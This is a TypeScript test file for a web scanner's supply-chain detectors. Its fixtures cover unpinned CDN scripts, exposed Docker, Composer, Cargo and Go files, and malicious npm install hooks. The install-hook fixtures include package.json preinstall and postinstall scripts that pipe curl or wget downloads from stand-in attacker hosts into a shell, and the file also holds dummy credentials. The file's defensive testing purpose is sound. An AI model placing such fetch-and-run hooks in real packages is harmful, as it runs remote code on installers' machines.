/**
 * Per-detector tests for the supply-chain category.
 *
 * Covers lib/scanner/checks/supply-chain.ts. Every detector is exercised
 * by the smoke harness (callable, no-throw, deterministic); fixtures
 * below cover the checks added on top of the original file-exposure
 * set (package-lock.json, requirements.txt, Gemfile, SRI, mixed content,
 * composer, .env), which are smoke-only.
 */

import { detectors } from "@/lib/scanner/checks/supply-chain";
import { runDetectorTests, type DetectorFixtures } from "./_test-harness";

const fixtures: DetectorFixtures = {
  "supply-chain-cdn-script-unpinned-version": [
    {
      description: "jsdelivr npm script with no version and no SRI",
      body: '<script src="https://cdn.jsdelivr.net/npm/lodash/lodash.min.js"></script>',
      expect: "fire",
      evidenceIncludes: "no pinned version",
    },
    {
      description: "unpkg script explicitly pinned to @latest",
      body: '<script src="https://unpkg.com/react@latest/umd/react.production.min.js"></script>',
      expect: "fire",
      evidenceIncludes: "no pinned version",
    },
    {
      description: "jsdelivr script pinned to an exact version, with SRI",
      body: '<script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js" integrity="sha384-abc123" crossorigin="anonymous"></script>',
      expect: "skip",
    },
    {
      description: "self-hosted script, not a CDN URL at all",
      body: '<script src="/static/js/app.js"></script>',
      expect: "skip",
    },
  ],

  "supply-chain-dockerfile-exposed": [
    {
      description:
        "docker-compose.yml pinned to a dotted Compose spec version (the near-universal modern format)",
      body: "version: '3.8'\nservices:\n  web:\n    image: myapp:latest\n",
      expect: "fire",
      evidenceIncludes: "docker-compose.yml",
    },
    {
      description: "docker-compose.yml pinned to a legacy bare-integer version",
      body: "version: '3'\nservices:\n  web:\n    image: myapp:latest\n",
      expect: "fire",
      evidenceIncludes: "docker-compose.yml",
    },
    {
      description: "Dockerfile with FROM and a build instruction",
      body: 'FROM node:18-alpine\nRUN npm install\nCMD ["node", "index.js"]\n',
      expect: "fire",
      evidenceIncludes: "Dockerfile",
    },
    {
      description:
        "blog prose mentioning docker-compose.yml without its content",
      body: "We use docker-compose.yml to define our services, similar to a Dockerfile.",
      expect: "skip",
    },
  ],

  "supply-chain-composer-auth-json-exposed": [
    {
      description: "http-basic block with a real, non-placeholder password",
      body: '{"http-basic":{"repo.example.com":{"username":"deployer","password":"s3cr3t-real-password-xyz123"}}}',
      expect: "fire",
      evidenceIncludes: "auth.json",
    },
    {
      description: "github-oauth block with a real-shaped token",
      body: '{"github-oauth":{"github.com":"ghp_9x8y7z6w5v4u3t2s1r0q9p8o7n6m5l4k3j2i1h"}}',
      expect: "fire",
    },
    {
      description: "http-basic block with an unfilled placeholder password",
      body: '{"http-basic":{"repo.example.com":{"username":"deployer","password":"your_password_here"}}}',
      expect: "skip",
    },
    {
      description:
        "ordinary composer.json (require/require-dev), no auth keys present",
      body: '{"require":{"php":">=8.0"},"require-dev":{"phpunit/phpunit":"^10"}}',
      expect: "skip",
    },
  ],

  "supply-chain-cargo-lock-exposed": [
    {
      description: "real Cargo.lock with [[package]] and crates.io source",
      body: '# This file is automatically @generated by Cargo.\nversion = 3\n\n[[package]]\nname = "serde"\nversion = "1.0.190"\nsource = "registry+https://github.com/rust-lang/crates.io-index"\n',
      expect: "fire",
      evidenceIncludes: "cargo.lock",
    },
    {
      description: "Cargo.toml (manifest, not the lock file)",
      body: '[package]\nname = "myapp"\nversion = "0.1.0"\n[dependencies]\nserde = "1.0"\n',
      expect: "skip",
    },
    {
      description: "blog prose mentioning Cargo.lock without its content",
      body: "Our project pins dependencies using Cargo.lock, similar to package-lock.json in npm.",
      expect: "skip",
    },
  ],

  "supply-chain-go-sum-exposed": [
    {
      description: "real go.sum with multiple module checksum lines",
      body: "github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=\ngithub.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=\n",
      expect: "fire",
      evidenceIncludes: "go.sum",
    },
    {
      description: "go.mod (module manifest, not the checksum file)",
      body: "module github.com/example/app\n\ngo 1.21\n\nrequire (\n\tgithub.com/pkg/errors v0.9.1\n)\n",
      expect: "skip",
    },
    {
      description: "single go.sum-shaped line, below the 2-line threshold",
      body: "github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=",
      expect: "skip",
    },
  ],

  "supply-chain-malicious-install-script": [
    {
      description: "postinstall pipes a curl download directly into bash",
      body: '{"name":"leftpad-utils","scripts":{"postinstall":"curl -sL https://evil.example.net/x.sh | bash"}}',
      expect: "fire",
      evidenceIncludes: "install hook",
    },
    {
      description: "preinstall pipes a wget download directly into sh",
      body: '{"name":"sneaky-pkg","scripts":{"preinstall":"wget -qO- http://attacker.test/setup.sh | sh"}}',
      expect: "fire",
    },
    {
      description: "ordinary postinstall running a local build script",
      body: '{"name":"good-pkg","scripts":{"postinstall":"node scripts/postinstall.js","prepare":"husky install"}}',
      expect: "skip",
    },
    {
      description:
        "documentation explaining the attack pattern, not a live package.json",
      body: 'This is a documentation example of a malicious pattern: "scripts": { "postinstall": "curl -sL https://evil.example.net/x.sh | bash" }',
      expect: "skip",
    },
  ],
};

runDetectorTests(detectors, fixtures);
